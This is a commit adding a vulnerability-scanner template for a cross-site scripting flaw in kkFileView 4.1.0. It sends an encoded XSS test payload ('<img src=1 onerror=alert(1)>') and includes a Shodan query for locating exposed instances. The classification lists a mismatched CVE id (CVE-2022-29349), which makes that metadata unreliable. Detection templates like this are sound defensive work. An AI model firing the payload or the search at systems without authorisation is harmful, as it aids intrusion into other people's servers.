Create CVE-2022-40879.yaml
parent
1dc959f37e
commit
d127329d7e
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-40879
|
||||
|
||||
info:
|
||||
name: kkFileView 4.1.0 - Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the parameter 'errorMsg.'
|
||||
reference:
|
||||
- https://github.com/kekingcn/kkFileView/issues/389
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-40879
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-29349
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.html:"kkFileView"
|
||||
verified: true
|
||||
tags: cve,cve2022,kkFileView,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydCgxKT49PQ=="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<img src=1 onerror=alert(1)>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue